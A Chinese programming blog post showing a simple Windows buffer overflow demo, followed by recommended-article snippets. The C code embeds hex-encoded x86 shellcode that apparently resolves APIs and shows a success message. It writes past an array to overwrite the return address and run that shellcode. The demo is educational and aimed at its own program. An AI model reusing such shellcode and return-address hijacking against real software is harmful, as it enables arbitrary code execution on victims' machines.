简单缓冲区溢出示例

最新推荐文章于 2021-03-02 01:40:44 发布
最新推荐文章于 2021-03-02 01:40:44 发布
阅读量1.3k 收藏
点赞数
分类专栏: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyousui/article/details/8510913
版权 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

unsigned char shellcode[] =
"\xEB\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03\xD9\x8B\x73\x20\x03\xF1"
"\x33\xFF\x4F\x47\xAD\x33\xED\x0F\xB6\x14\x01\x38\xF2\x74\x08\xC1"
"\xCD\x03\x03\xEA\x40\xEB\xF0\x3B\x6C\x24\x04\x75\xE6\x8B\x73\x24"
"\x03\xF1\x66\x8B\x3C\x7E\x8B\x73\x1C\x03\xF1\x8B\x04\xBE\x03\xC1"
"\x5B\x5F\x53\xC3\xEB\x4F\x33\xC0\x64\x33\x40\x30\x8B\x40\x0C\x8B"
"\x70\x1C\xAD\x8B\x48\x08\x58\x33\xDB\x33\xFF\x66\xBF\x33\x32\x57"
"\x68\x75\x73\x65\x72\x8B\xFC\x53\x51\x53\x50\x50\x53\x57\x68\x54"
"\x12\x81\x20\xE8\x8A\xFF\xFF\xFF\xFF\xD0\x8B\xC8\x68\x25\x59\x3A"
"\xE4\xE8\x7C\xFF\xFF\xFF\xFF\xD0\x59\x68\x97\x19\x6C\x2D\xE8\x6F"
"\xFF\xFF\xFF\xFF\xD0\xE8\xAC\xFF\xFF\xFF"
"缓冲区溢出成功!";

char *p = (char *)malloc(sizeof(char)*sizeof(shellcode));

int main(void)
{
	memcpy(p, shellcode, sizeof(shellcode));
	int buffer[1];
	buffer[2] = (int)p;
	return 0;
}

运行后效果图:


小神兵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
缓冲区溢出实例(一)--Windows
banacyo14206的博客
08-22 2285
一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。 ...
arduino串口接收数据包_Arduino 串口接收转发十六进制数据,软串口收不到数据
weixin_32924297的博客
12-23 6515
我是Arduino初学者,今日尝试用Arduino nano 收串口发来16进制数据,再由软串口转发给下级设备,下级设备返回16进制数据。首先简单测试代码如下:#include SoftwareSerial mySerial(2,3);void setup(){Serial.begin(9600);mySerial.begin(9600);}void loop(){if (Serial.avail...
arduino的串口缓冲区_关于arduino清空串口缓存(转)
weixin_39797912的博客
12-21 4716
在arduino1.0之前的版本Serial.flush()的作用是是清空串口缓存( dropping received incoming data)。但在1.0之后的版本Serial.flush()的作用调整为了等待串口数据传送完毕(Waits for the transmission of outgoing serial data to complete.)(引用自http://ardui...
java串口读取太快字符太多_收到太多数据时,Arduino会挂起
weixin_36321633的博客
03-02 322
我遇到了Arduino Uno的问题 . 它应该将数据从Novint Falcon传输到Dspace,并从Dspace接收传感器数据,然后发送回Falcon . Dspace使用Simulink编程 .我的Arduino代码运行如下:使用Serial从笔记本电脑读取6个字节 .使用SoftwareSerial将8个字节写入Dspace .使用SoftwareSerial从Dspace读取3个字节...
arduino的串口缓冲区_arduino串口通信
weixin_39628342的博客
12-21 3109
1、串口设置arduino串口通信Serial.begin();说明开启串口,通常置于setup()函数中。语法Serial.begin(speed);Serial.begin(speed,config);参数speed: 波特率,一般取值300, 1200, 2400, 4800, 9600, 14400, 19200, 28800, 38400, 57600,115200config: 设置数...
缓冲区溢出示例代码课件ppt
06-24
本课件主要围绕“缓冲区溢出”这一重要的计算机安全问题展开,通过详细的PPT演示和示例代码,旨在帮助学习者理解和掌握缓冲区溢出的基本原理及其防范措施。缓冲区溢出是软件开发中常见的安全漏洞,可能导致系统崩溃...
Security-Exercises:缓冲区溢出开发示例
05-18
[带有gets功能的缓冲区溢出] Ubuntu 16.04,64位操作系统概述什么是缓冲区溢出? 为什么有问题? 缓冲区溢出很快就是一个异常,程序在将数据写入缓冲区时会超出缓冲区边界。 也就是说,缓冲区是按固定大小创建的,...
缓冲区溢出攻击原理实例
08-17
在提供的"BufferOverflow"文件中,可能包含了一个简单缓冲区溢出示例。通常,这种例子会创建一个有固定长度的缓冲区,然后使用`strcpy()`等不安全函数尝试复制超过缓冲区大小的字符串,从而触发溢出。 例如,下面...
缓冲区溢出实验
12-09
2. **编写示例程序**:创建一个简单的C程序,故意引发缓冲区溢出,观察程序的行为。 3. **调试分析**:使用GDB(GNU Debugger)进行程序调试,查看溢出时内存的状态,理解溢出是如何发生的。 4. **防范措施**:学习...
缓冲区溢出教程及配套代码
11-07
压缩包内的“缓冲区溢出教程配套光盘(精简).7z”系列文件可能是教程的主要内容,包括文字资料、代码示例和可能的演示实例。而“Q版缓冲区溢出教程.7z”可能提供了更加简化或易懂的版本,适合初学者快速入门。 总的...
缓冲区溢出例子 <img src="/images/sunny.gif" align="absmiddle
02-23
缓冲区溢出例子 for delphi2005/Delphi7
arduino的串口缓冲区_C#无法从串口Arduino读取完整缓冲区
weixin_39830200的博客
12-21 303
如果Arduino以此波特率连续发送字节,则速度将最大为9600/10 = 960字节/秒(1个字节将需要10个波特:8个数据位1开始1个停止) . 然后将在超过104秒内收集100000个字节 . 如果通信没有中断,您的代码应该可以正常工作 . 要调试它,您可以在while循环中添加它:System.Threading.Thread.Sleep(1000); //sleep 1 secondCo...
缓冲区溢出实例(一)–Windows
weixin_41082546的博客
03-12 1513
一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。 注意,Wi...
简单缓冲区溢出试验
木头石头的专栏
01-12 1333
原文地址:http://drops.wooyun.org/papers/1421 from:http://www.spectrumcoding.com/tutorials/exploits/2013/05/27/buffer-overflows.html 翻译的比较逗比,都是按照原文翻译的,加了少量润色。中间有卡住的地方或者作者表述不清楚的地方我都加了注,大家将就看吧=v=。
缓冲区溢出利用的简单例子
malixxx
08-27 758
缓冲区溢出利用的简单例子 gcc从版本4以后就已经加上了缓冲区溢出攻 击的保护机制(这个以后再讲),所以在gcc的4版本以上进行实验的读者,可以在编译时加上-fno-stack-protector选项来关闭缓冲区溢 -fno-stack-protector这个编译的时候可以不加. 出保护。当然,也可以在更低版本的gcc中实现。 可能每一次gdb调试,分配给程序的虚拟地址空间都...
再探VS2010缓冲区溢出检查
HenryFenny的专栏
11-09 3104
再探VS2010缓冲区溢出检查        (还是转自我的人人,不过人人因为无聊,已经注销)        有好友凌晨5点QQ问我一个问题:如果函数中有两个缓冲区,然后其中一个被写入的时候覆盖了下一个缓冲区部分数据,这样会不会引起异常呢?本着“实践出真知”的精神,从床上爬起来,我又一次打开了VS和OD。          测试函数代码如下:          void test(char
windows 缓冲区溢出 简单例子
ayangmax的博客
05-19 1095
#include //#define sz1 "hello" int main(int argc, char *argv[]) { //char sz1[8] = "hello"; //const char *sz1 = "hello"; char sz1[8]; char sz2[8]; memset(sz1,0x00,sizeof(sz1));
缓冲区溢出原理及教学版攻击演示
xdx54321的博客
04-16 2134
简单说下其原理: 通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,进而运行精心准备的指令,以达到攻击的目的。 如上图,程序的缓冲区比作一个个格子(内存单元),每个格子中存放不同的东西,有的是命令,有的是数据,当程序需要接收用户数据,程序预先为之分配了4个格子(上图中黄色的0~3号格子)。按照程序设计,就是要求用户输入的数据不超过4个。而用户在输入数据时
缓冲区溢出原理详解
覃杨森的博客
02-12 4860
下面将有实例引入缓冲区溢出的介绍: void main() { int i=0; int a[]={1,2,3,4,5,6,7,8,9,10}; for(i=0;i<=10;i++) { a[i]=0; printf("Hello World!\n"); } } 首先,这段代码会出现死循环,为什么?因为数组溢出了,而溢出的位置正好是变量i的位置,所以当i=10时,a[10]的位置正好是i...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值